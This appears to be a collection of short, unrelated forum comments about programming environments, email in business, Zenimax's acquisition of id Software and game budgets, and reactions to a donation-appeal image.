Good programming environments are not yet invented ! Certainly VS.NET is more productive than Turbo Pascal, but IMHO the programming experience is the same.

IMHO email is unavoidable for business communications. It's one of the first cloud hosted apps, the tools are mature and it has a probative value.

I'd expect it to be a lot more than that. $25 million is a typical budget for a single AAA console title these days. Not only did Zenimax buy id's game development experience they also bought their tech, which is probably worth that on its own. Mind you, id were badly in need of a publisher at the time.

There's something about that picture that makes me really not want to donate. I understand it's working on others and its probably silly of me but something just puts me off.

I suspect that particular one has the highest "conversion" rate.
